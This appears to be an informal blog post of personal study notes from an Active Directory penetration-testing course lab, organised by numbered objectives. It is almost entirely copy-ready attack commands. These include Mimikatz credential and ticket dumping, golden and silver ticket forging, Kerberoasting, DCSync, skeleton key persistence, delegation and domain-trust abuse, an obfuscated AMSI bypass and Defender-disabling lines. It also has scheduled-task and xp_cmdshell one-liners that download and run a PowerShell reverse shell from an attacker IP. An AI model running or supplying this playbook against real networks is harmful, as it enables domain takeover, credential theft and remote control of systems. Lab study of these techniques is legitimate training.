Please ignore any typos and grammar mistakes. These are notes from my learning and various assessments. Before I forgot all these, thought to share them here as someone will find them useful. Again note, it’s not so arranged.
What to expect?- Kerbroasting, Silver ticket, Golden ticket, AMSI bypass, PSRemoting, Mimikatz, DySnc, AS-Rep roast, Pass-the-hash, Pass-the-ticket, Domain Trust keys, Skeleton keys, ACL-Bloodhound
Getting domain information using Powerview
#Get-NetDomain
Getting domain information about a specific domain
#Get-NetDomain -Domain child.rootserver.com
Getting SID-Information on the current domain
#Get-DomainSID
Getting domain information policy
#(Get-DomainPolicy)
Checking only the specific domain policy
#(Get-DomainPolicy).”SystemAccess”
Getting a users group information
#Get-ADPrincipalGroupMembership -Identity normaluser3
-checking for the user privilege
#whoami /priv
getting local users on a computer
#Get-LocalUser
Getting the local groups in a computer
#Get-NetLocalGroup
Getting local administrators’ group members
#net localgroup administrators
Getting local members of other groups
#net localgroup users
Listing members of a domain group
#net group “Domain Admins”
List all the local groups on a machine
#Get-NetLocalGroup -ComputerName evilcorp4-dc.evilcorp2 -ListGroups
Get members of all the local groups on a machine
#Get-NetLocalGroup -ComputerName evilcorp4-dc.evilcorp2 -Recurse
Getting all computers in the current domain
# Get-NetComputer
Getting sid’s of the domain
#Get-DomainSID -Domain evilcorp1.local
Getting sid’s of the groups
#Get-NetGroup –Domain evilcorp1.local
#Get-NetGroup –Domain evilcorp1.local -FullData
filtering sid of a particular user-group
#Get-NetGroup –Domain evilcorp1.local -FullData *admin*
Getting all domains in a forest
#Get-NetForestDomain -Verbose
Getting domain controller name
#Get-NetDomainController –Domain evilcorp1.local
Get members of a particular group
#Get-NetGroupMember -Identity “admins” -Recurse’
Get full data of a group
#Get-NetGroupMember -GroupName “Domain Admins”
Get group membership of a user
#Get-NetGroup –UserName “user122”
Get a user properties
#Get-NetUser –Username user1
Find users with sid history set
#Get-NetUser -LDAPFilter ‘(sidHistory=*)’
checking acl of a user
#Get-ObjectAcl -SamAccountName “user1” –ResolveGUIDs -Verbose
checking acl of a group
#Get-ObjectAcl -SamAccountName “Domain Admins” -ResolveGUIDs -Verbose
check for modified rights/permissions for the userx, we can use Invoke-ACLScanner from PowerView
#Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match “user”}
check for modified rights/permissions for a group
#Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match “RDPUsers”}
checking for users with SPN set
#Get-NetUser -SPN
checking spn of a user
##Get-DomainUser -Identity supportXuser | select serviceprincipalname
Finding external domain trust
#Get-NetForestTrust
——————————————-
1. what if you have krbtgt hash- if we have the domains admin’s krbtgt hash, we can create a golden ticket and inject it into the memory of any computer that is in the DC’s network
2. What if you have a silver ticket- With DC’s system account you can create a silver ticket, inject it into the memory of s computer, create a scheduled task, and get reverse-shell.
3. check for replication-DYSNC rights?- This works with only DA privileges.
——————————————-
Always note down the NTLM hashes of
-krgbt
-administrators
-machine accounts
Always note down the sid numbers of
-domain controller
-domain admins group(EA,DA)
——————————————-
Silver ticket
#Invoke-Mimikatz -Command ‘”kerberos::golden /User:Administrator /domain:testing.dev.corp.local /sid:S-1-5-21-2244954328-2189829416-1702281483-1219 /target:testing.dev.corp.local /service:CIFS /rc4:fbd8aaee4e8beac14739cc364b696f83 /user:Administrator /ptt”‘
Once you have a silver ticket you can add a new service in the form of a schedule task to get a reverse shell.
Here we can use a tool called powercat to get the reverse shell.
#schtasks /create /S evilcorp4-dc.evilcorp2.evilcorp1.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “UserX” /TR “powershell.exe -c ‘iex (New-Object Net.WebClient).DownloadString(”http://172.16.100.X/Invoke-PowerShellTcp.ps1”’)'”
#schtasks /Run /S evilcorp4-dc.evilcorp2.evilcorp1.local /TN “UserX”
#powercat -lvp 443 -t 1000
It is basically in the kerborosting, ‘.kribi’ tickets are created and downloaded offline and brute-forced to get original passwords.
#klist
The sysadmin, which is a domain administrator has an SPN set! Let’s request a ticket for the service.
#Add-Type -AssemblyNAme System.IdentityModel
#New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “serviceprinciplename”
#New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “MSSQLSvc/evilcorp4-mgmt.evilcorp2.evilcorp1.local”
—————————————————————–
checking local administrator’s group
#net localgroup Administrators
checking a users privilege
#net user userx
Adding a user users to ‘local administrators’ and remote desktop users group
#net localgroup “Administrators” useruser /add
#net localgroup “Remote Desktop Users” useruser /add
add a user named ‘dave’ to the domain group “Domain Admins”
#net group “Domain Admins” testuser /ADD /DOMAIN
——————————————————————
Type the following command to see the Microsoft Defender Antivirus status and press Enter:
#Get-MpComputerStatus
#Get-service Windefend
#Get-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated
To completely disable Windows Defender on a computer, use the command:
#New-ItemProperty -Path “HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender” -Name DisableAntiSpywa
#Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
#Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
#Set-MpPreference -DisableIOAVProtection $true
#S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2’) + (‘uZ’+’x’) ) ([TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ((‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”((“{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f(‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
Changing execution policy
#Set-ExecutionPolicy unrestricted
#powershell.exe -ep -bypass
unblocking a file that was downloaded
#Unblock-File -Path C:\Downloads\script1.ps1
Changing the Execution Policy Permanently
#Set-ExecutionPolicy unrestricted
-Once u get admin access check whether the local admin has admin privileges in any other systems in the domain using psremoting or using the below script
#Invoke-UserHunter -CheckAccess
#Find-LocalAdminAccess -Verbose
#Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName evilcorp4-mgmt.evilcorp2.evilcorp1.local
Creating a session and executing the commands from that session
#Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
#Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
#iex (iwr http://172.16.10.1/Invoke-Mimikatz.ps1 -UseBasicParsing)
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
#powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1’); Invoke-AllChecks”
Powershell-remoting
#Enter-PSSession -ComputerName evilcorp4-adminsrv.evilcorp2.evilcorp1.local
#$sess = New-PSSession -ComputerName evilcorp4-mgmt.evilcorp2.evilcorp1.local
Another method
#$sess = New-PSSession -ComputerName evilcorp4-dc
#Enter-PSSession $sess
copy tools using a session method
#Copy-Item -ToSession $appsrv1 -Path C:\AD\Tools\Rubeus.exe -Destination C:\Users\appadmin\Downloads
Copy-Item -ToSession $sess -Path C:\Users\useruser\Downloads\PowerUpSQL.ps1 -Destination C:\Users\useruser
Copying files to a remote systems directory
#Copy-Item .\Invoke-MimikatzEx.ps1 \\evilcorp4-adminsrv.evilcorp2.evilcorp1.local\c$\’Program Files’
Try accessing the filesystem on the domain controller-
#ls \\evilcorp4-dc.evilcorp2.evilcorp1.local\c$
#Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName evilcorp4-mgmt.evilcorp2.evilcorp1.local
#gwmi -Class win32_computersystem -ComputerName evilcorp4-dc.evilcorp2.evilcorp1.local
Running mimikatz on another machine using sessions method
#$sess = New-PSSession -ComputerName evilcorp4-dc
#Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
#Enter-PSSession $sess
To get all the hashes even the krgbt and other machine account hashes.
Dumps NTLM hashes of sam account
#Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘
Filter out only one user’s sam hashes
#Invoke-Mimikatz -Command ‘”lsadump::lsa /patch /user:krbtgt”‘
SEKURLSA::TICKETS to dump Kerberos tickets for all authenticated users on the system.
#Invoke-Mimikatz -Command ‘”sekurlsa::tickets /export”‘
Dumping AES keys
#Invoke-Mimikatz -Command ‘”sekurlsa::ekeys”‘
Dumping data from the credential vault
#Invoke-Mimikatz -Command ‘”token::elevate” “vault::cred /patch”‘
Once u have the hashes from mimikatz output use the hashes to do PTH-“Over pass the hash” generate tokens from hashes.
The essence of the overpass hash technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication.
A simple way to do this is again with the sekurlsa::pth command from Mimikatz
#Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:Administrator /domain:evilcorp2.evilcorp1.local /ntlm:<ntlmhash> /run:powershell.exe”‘
#Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:svcadmin /domain:evilcorp2.evilcorp1.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe”‘
The cached Kerberos tickets can be viewed using both the KLIST command. These cached tickets can sometimes have both the TGT and TGS.
-First, check for abusable service and add the current user to the local admin group.
#Get-ServiceUnquoted
#Get-ModifiableServiceFile -Verbose
Let’s use the abuse function for Get-ModifiableService and add our current domain user to the local Administrators group.
#Invoke-ServiceAbuse -Name ‘AbyssWebServer’ -UserName ‘evilcorp4\userx’
Just logoff and logon again
Golden ticket
#Invoke-Mimikatz -Command ‘”kerberos::golden /User:Administrator /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”‘
Try accessing the filesystem on the domain controller-
#ls \\evilcorp4-dc.evilcorp2.evilcorp1.local\c$
#Invoke-Command -ScriptBlock{whoami;hostname} -computername evilcorp4-dc
We can also run WMI commands on the DC
#gwmi -Class win32_computersystem -ComputerName evilcorp4-dc.evilcorp2.evilcorp1.local
Silver Ticket
#Invoke-Mimikatz -Command ‘”kerberos::golden /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:evilcorp4-dc.evilcorp2.evilcorp1.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt”‘
Once we create a silver ticket you have to create a scheduled task and make it run from the local machine so that we get a reverse shell from the DC.
#schtasks /create /S evilcorp4-dc.evilcorp2.evilcorp1.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “UserX” /TR “powershell.exe -c ‘iex (New-Object Net.WebClient).DownloadString(”http://172.16.100.X/Invoke-PowerShellTcp.ps1”’)'”
#schtasks /Run /S evilcorp4-dc.evilcorp2.evilcorp1.local /TN “UserX”
#powercat -l -p 443 -v -t 1024
For accessing wmi service, the attacker will have to create silver tickets for two service:-RPCSS & Host
Silver ticket for Host
#Invoke-Mimikatz -Command ‘”kerberos::golden /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:evilcorp4-dc.evilcorp2.evilcorp1.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt”‘
Silver ticket for RPCSS
#Invoke-Mimikatz -Command ‘”kerberos::golden /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:evilcorp4-dc.evilcorp2.evilcorp1.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt”‘
Copying files to a remote systems directory
#Copy-Item .\Invoke-MimikatzEx.ps1 \\evilcorp4-adminsrv.evilcorp2.evilcorp1.local\c$\’Program Files’
Constrained Language Mode
first, check for the language mode
#$ExecutionContext.SessionState.LanguageMode
Now, let’s enumerate the app locker policy.
#Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Once you have the DA privileges perform Skeleton key attack on the DC.Run Mimikatz on the dc followed by a given comment
#Invoke-Mimikatz -Command ‘”privilege::debug” “misc::skeleton”‘
#######persistance###########
Obj-9
Dumping dsrm password once we have the DA privileges
#Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::sam”‘ -Computername evilcorp4-dc
But before we use the hash for PTH we need to change the login behavior for the account by modifying the registry on the DC. We can do this as follows:
#New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
Now is the PTH.
#ls \\evilcorp4-dc.evilcorp2.evilcorp1.local\c$
Obj-12(DA priv needed)
Once after we have the DA privilege we can give any user the dysnc(replication) right. That means the user who is given the desync right will be able to request the DC for password hashes.
Checking if a user is having DCSYNC right
#Get-ObjectAcl -DistinguishedName “dc=evilcorp2,dc=evilcorp1,dc=local” -ResolveGUIDs | ? {($_.IdentityReference -match “userx”) -and (($_.ObjectType -match ‘replication’) -or ($_.ActiveDirectoryRights -match ‘GenericAll’))}
If no dysnc right is found, then add dysnc right to the user using the below powerview command
#Add-ObjectAcl -TargetDistinguishedName “dc=evilcorp2,dc=evilcorp1,dc=local” -PrincipalSamAccountName userx -Rights DCSync -Verbose
Thereafter run dcsync attack using the mimikatz
#Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:evilcorp4\krbtgt”‘
Obj-13(DA not needed)
executing PowerShell remoting and WMI without requiring administrator access on the DC-machine.
1. modifying the host security descriptors for WMI on the DC to allow userx access to WMI:
#. C:\AD\Tools\RACE.ps1
#Set-RemoteWMI -SamAccountName userx -ComputerName evilcorp4-dc.evilcorp2.evilcorp1.local -namespace ‘root\cimv2’ -Verbose
now execute wmi command
#gwmi -class win32_operatingsystem -ComputerName evilcorp4-dc.evilcorp2.evilcorp1.local
Obj-14(DA not needed)(cracking needed)()(TGS)
Using powerview enumerate the users having the spn set
#Get-NetUser -SPN
once we identified the user, we will request a ticket for that service. This requested ticket will have the DA’s hash.
#Add-Type -AssemblyNAme System.IdentityModel
#New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “MSSQLSvc/evilcorp4-mgmt.evilcorp2.evilcorp1.local”
Let’s check if we have the TGS for the service
#klist
dump the tickets to the disk for further bruteforce.
#Invoke-Mimikatz -Command ‘”kerberos::list /export”‘
Now, copy the MSSQL ticket to the Kerberoast folder and offline crack the Service Account Password:
#Copy-Item .\1-40a10000-userx@MSSQLSvc~evilcorp4-mgmt.evilcorp2.evilcorp1.local-evilcorp2.evilcorp1.LOCAL.kirbi
#python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\1-40a10000-userx@MSSQLSvc~evilcorp4-mgmt.evilcorp2.evilcorp1.local-evilcorp2.evilcorp1.LOCAL.kirbi
Obj-15(DA not needed)(cracking needed-tickets saved to disk)
Finding users with Kerberos pre-auth disabled and then cracking the AS-REP encrypted part of Kerberos ticket using ASREPROAST.ps1
#\PowerView_dev.ps1
getting users with no_pre-auth
#Get-DomainUser -PreauthNotRequired -Verbose
Next, we can use Get-ASREPHash from ASREPRoast to request the crackable encrypted part
#. .\ASREPRoast\ASREPRoast.ps1
#Get-ASREPHash -UserName VPNxuser -Verbose
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
When checking for Generic all rights, check for the ‘Identityreference’ property-Read on this more.
To see all the access rights of the user offsec, use the below command
#Get-ObjectAcl -Identity offsec
The output of this command will give you a big output with ‘objectsid’ which is a bit difficult to understand what kind of on=bject it is. So here we can convert the object sid to a readable format with ‘converstfromsid’ script. download the script from here-https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/ConvertFrom-SID.ps1
Append this convertfromsid script with Get-ObjectAcl to see a better output.
# Get-ObjectAcl -Identity dc03nu1 -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName -Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ? {$_.ActiveDirectoryRights -eq “GenericAll”}
If you want to see only the acl’s of the user’s , just append the Get-DomainUser to the above script
#Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName -Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ? {$_.ActiveDirectoryRights -eq “GenericAll”}
To see the ACL’s of the groups, we the below command
#Get-Domaingroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName -Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ? {$_.ActiveDirectoryRights -eq “GenericAll”}
if you know the samaccountname, then acl checking makes it easier
#Get-ObjectAcl -SamAccountName admins -ResolveGUIDs
#Get-ObjectAcl -SamAccountName admins -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq “GenericAll”}
Checking the ACL on a group
#Get-ObjectAcl -SamAccountName “Domain Admins” -ResolveGUIDs -Verbose
Read below for better practice
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
https://sensepost.com/blog/2020/ace-to-rce/
Final Command to a user having general permission. here the general rights can be checked with other rights as well.
#Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match “youruser”} | ? {$_.ActiveDirectoryRights -eq “GenericAll”}
Obj-16(DA not required)(cracking needed-tickets saved to disk)
Here we check for a user who has generic-all rights and also whether that user has SPN set. Once we set SPN we will force TGS for the SPN and then bruteforce it offline
#. .\PowerView_dev.ps1
checking ACL of a group
#Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match “RDPUsers”}
checking spn of a user
#Get-DomainUser -Identity supportXuser | select serviceprincipalname
Force set spn on a user
#Set-DomainObject -Identity supportXuser -Set @{serviceprincipalname=’evilcorp4/whateverX’} -Verbose
requesting TGS
#Add-Type -AssemblyName System.IdentityModel
#New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “evilcorp4/whateverX”
#klist
Dumping the token to the disk and brute-forcing it.
#Invoke-Mimikatz -Command ‘”kerberos::list
obj-17(DA not required)(PTT)(dumping tickets)(rubeus)()
check for unconstraint delegation
#Get-NetComputer -Unconstrained | select -ExpandProperty name
Once you have the machine try to get the local-admin access to the machine and execute mimikatz to dump the tickets
#Invoke-Mimikatz -Command ‘”sekurlsa::tickets /export”‘
so see the tickets properly us the below ticket
#ls | select name
Please note that these tickets start with the name as follows-“[0;6f5638a]-2-0-60a10000-Administrator@krbtgt-evilcorp2.evilcorp1.LOCAL.kirbi”
Now perform the PTT using the tickets dumped
#Invoke-Mimikatz -Command ‘”kerberos::ptt C:\Users\appadmin\Documents\userX\[0;6f5638a]-2-0-60a10000-Administrator@krbtgt-evilcorp2.evilcorp1.LOCAL.kirbi”‘
Now perform the command execution on the targeted server
#Invoke-Command -ScriptBlock{whoami;hostname} -computername evilcorp4-dc
In some cases, we will not be having the tickets of the DA on the machine we are targeting. So in that case we can force the DA to connect to our local machine so that the DA will give out the hashes/tickets.
here we are abusing a feature called ‘printer bug’ which will force the DA to give out the hashes. So the methodology followed is that we are running a tool called rubeus.exe .Rubuex will wait for the incoming connection which will give us the tgt. here a tool called MS-RPRN is used to initiate the connection between the local machine and the server machine.
Rubuex waiting for the incoming connection
#.\Rubeus.exe monitor /interval:5 /nowrap
MS-RPRN initiated the fake connection with the server
#.\MS-RPRN.exe \\evilcorp4-dc.evilcorp2.evilcorp1.local \\evilcorp4-appsrv.evilcorp2.evilcorp1.local
In the session where Rubeus is running, we can see the TGTs.Again with the Rubeus we can perform the PTT
#.\Rubeus.exe ptt /ticket:<Base64EncodedTicket part of the tgt got from the rubues monitering>
To see the injected ticket
#klist
#ls \\evilcorp4-dc.evilcorp2.evilcorp1.local\c$
Now if you want the NTLM hash perform DCSync attack against evilcorp4-DC using the injected ticket
#Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:evilcorp4\krbtgt”‘
Obj-18(kekeo)(rubeus)(kekeo)(dcsync without DA priv)
Attacking a user with constraint delegation thereby requesting the tgt followed tgs by using the NTLM hash obtained previously and then injecting that tgt into the current session. In case of constraint delegation, the user is always mapped to a service and the tgs we get will be also for only that particular service. So with the ntlm hash first the tgt is requested. once we get the tgt, we request for the tgs with the tgt we got. This TGT is then injected into the current session for code execution.
checking users with constraint delegation
#Get-DomainUser -TrustedToAuth
once we find the user we can use kekkeo or rubeus to extract tgt
1. By using keko
#.\kekeo.exe
We can use the tgt::ask module from kekeo to request a TGT from websvc. here web svc is the user and we already have the NTLM hash.
#tgt::ask /user:websvc /domain:evilcorp2.evilcorp1.local /rc4:cc098f204c5887eaa8253e7c2749156f
Now, let’s use this TGT and request a TGS
#tgs::s4u /tgt:TGT_websvc@evilcorp2.evilcorp1.LOCAL_krbtgt~evilcorp2.evilcorp1.local@evilcorp2.evilcorp1.LOCAL.kirbi /user:Administrator@evilcorp2.evilcorp1.local /service:cifs/evilcorp4-mssql.evilcorp2.evilcorp1.LOCAL
Now inject the tgs to the current session and access the particular service
#Invoke-Mimikatz -Command ‘”kerberos::ptt TGS_Administrator@evilcorp2.evilcorp1.local@evilcorp2.evilcorp1.LOCAL_cifs~evilcorp4-mssql.evilcorp2.evilcorp1.LOCAL@evilcorp2.evilcorp1.LOCAL.kirbi”‘
#ls \\evilcorp4-mssql.evilcorp2.evilcorp1.local\c$
2. by using Rubeus
In the below command, we request a TGT for websvc using its NTLM hash to get a TGS for websvc as the Domain Administrator – Administrator.
#.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:”CIFS/evilcorp4-mssql.evilcorp2.evilcorp1.LOCAL” /ptt
Check if the TGS is injected
#klist
#ls \\evilcorp4-mssql.evilcorp2.evilcorp1.local\c$
enumerate the computer accounts with constrained delegation
1.Using kekeo
#Get-DomainComputer -TrustedToAuth
once we have the machine we use kekeo for requesting the TGT
#.\kekeo.exe
#tgt::ask /user:evilcorp4-adminsrv$ /domain:evilcorp2.evilcorp1.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
requesting tgs for two services- Time and ldap at same time.
#tgs::s4u /tgt:TGT_evilcorp4-adminsrv$@evilcorp2.evilcorp1.LOCAL_krbtgt~evilcorp2.evilcorp1.local@evilcorp2.evilcorp1.LOCAL.kirbi /user:Administrator@evilcorp2.evilcorp1.local /service:time/evilcorp4-dc.evilcorp2.evilcorp1.LOCAL|ldap/evilcorp4-dc.evilcorp2.evilcorp1.LOCAL
using Ldap ticket
#Invoke-Mimikatz -Command ‘”kerberos::ptt TGS_Administrator@evilcorp2.evilcorp1.local@evilcorp2.evilcorp1.LOCAL_ldap~evilcorp4-dc.evilcorp2.evilcorp1.LOCAL@evilcorp2.evilcorp1.LOCAL_ALT.kirbi”‘
use DCSync from mimikatz without DA privileges
#Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:evilcorp4\krbtgt”‘
2. Using rubeus
the above same attack using the rebues
#.\Rubeus.exe s4u /user:evilcorp4-adminsrv$ /rc4:8c6264140d5ae7d03f7f2a53088a291d /impersonateuser:Administrator /msdsspn:”time/evilcorp4-dc.evilcorp2.evilcorp1.LOCAL” /altservice:ldap /ptt
The /altservice parameter above helps us to run the dysnc attack directly
#klist
#Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:evilcorp4\krbtgt”‘
obj-19(DA privilege needed)(escalation to EA)(domain trust key)(kribirator.exe)(asktgs.exe)(using krgbt hash)
Method 1
If we are DA , then we can become EA using two methods
-using the trust keys(obj-19)
-getting a reverse shell using the krbtgt hash of the DA(obj-20)
when it comes to cross-domain access, like someone accessing from evilcorp4 to evilcorp3 it’s the trust-key that’s abused to get privilege escalation.
when I say trust keys, it means injecting inter-realm TGT keys into the memory using mimikatz.
Here the trust between two domains is abused. We request for inter-realm tgt followed by TGS. Here the TGS requested is for a particular service in the enterprise domain. Here the attacked service is CIFS.
Once we have the DA privileges let’s dump the trust keys using the mimikatz.
#Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘
create inter-realm tgt
#Invoke-Mimikatz -Command ‘”kerberos::golden /user:Administrator /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:f052addf1d43f864a7d0c21cbce440c9 /service:krbtgt /target:evilcorp1.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi”‘
With the tgt we got a request for TGS
#.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.evilcorp1.local
now present to the tgs to the target device
#.\kirbikator.exe lsa .\CIFS.mcorp-dc.evilcorp1.local.kirbi
Now access the targeted service
#ls \\mcorp-dc.evilcorp1.local\c$
The same can be done using the Rubues.exe
Method 2
The same can be performed using the Rubeus also.
#.\Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.evilcorp1.local /dc:mcorp-dc.evilcorp1.local /ptt
Obj-20(DA privelege needed)(krgbt ticket needed)(escalation to EA)
Once you have the krbtgt ticket of the DA we can go for the EA escalation. So first create an inter-realm TGT(trust key)
#Invoke-Mimikatz -Command ‘”kerberos::golden /user:Administrator /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi”‘
Next, inject the tgt using mimikatz
#Invoke-Mimikatz -Command ‘”kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi”‘
code execution
#gwmi -class win32_operatingsystem -ComputerName mcorp-dc.evilcorp1.local
Getting a reverse-shell
#schtasks /create /S mcorp-dc.evilcorp1.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “STCheckx” /TR “powershell.exe -c ‘iex (New-Object Net.WebClient).DownloadString(”http://172.16.100.x/Invoke-PowerShellTcpEx.ps1”’)'”
#schtasks /Run /S mcorp-dc.evilcorp1.local /TN “STCheckx”
#powercat -l -v -p 443 -t 1000
Obj-21(DA privilege needed)(trust-key needed)(KRGTBT)(asktgs)(kirbirator)
Method 1-Using asktgs & kirbirator
Once you have the DA privelege you can generate the trust keys using the below mimikatz command.
#Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘ -ComputerName evilcorp4-dc.evilcorp2.evilcorp1.local
Once u have the trust keys generate intern-realm TGT
#Invoke-Mimikatz -Command ‘”Kerberos::golden /user:Administrator /domain:evilcorp2.evilcorp1.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:0fd0741334bd0ef966f87094f10cc522 /service:krbtgt /target:evilcorp3.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi”‘
once u get the tgt, create tgs for a service
#.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/evilcorp3-dc.evilcorp3.local
Then present the TGS to the target forest
#.\kirbikator.exe lsa .\CIFS.evilcorp3-dc.evilcorp3.local.kirbi
Method 2- using Rubeus
Passing the TGS to a specific service can be again done with the Rubeus again if you have the tgt.
#.\Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/evilcorp3-dc.evilcorp3.local /dc:evilcorp3-dc.evilcorp3.local /ptt
#klist
#ls \\evilcorp3-dc.evilcorp3.local\Sharedwithevilcorp4\
Obj-22(SQl server link)
SQL link is a concept where different sql servers from different domains or forests can be inter-connected for communication. if these links are not properly checked my lead to RCE on the linked SQL servers.
enumerating sql servers in the domain
#Import-Module .\PowerupSQL.psd1
#Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
Crawling for SQL links in a SQL server
#Get-SQLServerLinkCrawl -Instance evilcorp4-mssql.evilcorp2.evilcorp1.local -Verbose
Checking whether xp-cmdshell is enabled, which may lead to command execution.
#Get-SQLServerLinkCrawl -Instance evilcorp4-mssql.evilcorp2.evilcorp1.local -Query “exec master..xp_cmdshell ‘whoami'”
if this is working out then we can check for PowerShell reverse shell.
#Get-SQLServerLinkCrawl -Instance evilcorp4-mssql.evilcorp2.evilcorp1.local -Query ‘exec master..xp_cmds hell “powershell iex (New-Object Net.WebClient).DownloadString(”http:// 172.16.100.X/Invoke-PowerShellTcp.ps1”)”‘
#######################################################################
Domain enumeration-ACL
ACL- two types
DACL- this defines the kind of permission one has on an object like read, write, delete, etc
SACL- This defines the log success and failure audit message when an object is accessed.
Domain enumeration- Trust
Finding external domain trust
#Get-NetForestTrust
Privilege Escalation
-when checking for unquoted service path privilege-escalation make sure that the privilege for that particular
service is set to LocalSystem/administrator and also the user has the right to restart the service.
This can be checked if the ‘CanRestart’ property is set to ‘True’.
Lateral Movement
1. Powershell Remoting
-PowerShell Remoting lets you run PowerShell commands or access full PowerShell sessions on remote Windows systems. It’s similar to SSH for accessing remote terminals on other operating
systems.PowerShell Remoting is essentially a native Windows remote command execution feature that’s built on top of the Windows Remote Management (WinRM) protocol.
-To use Windows PowerShell remoting, the remote computer must be configured for remote management.
Type
-one to one
-one too many
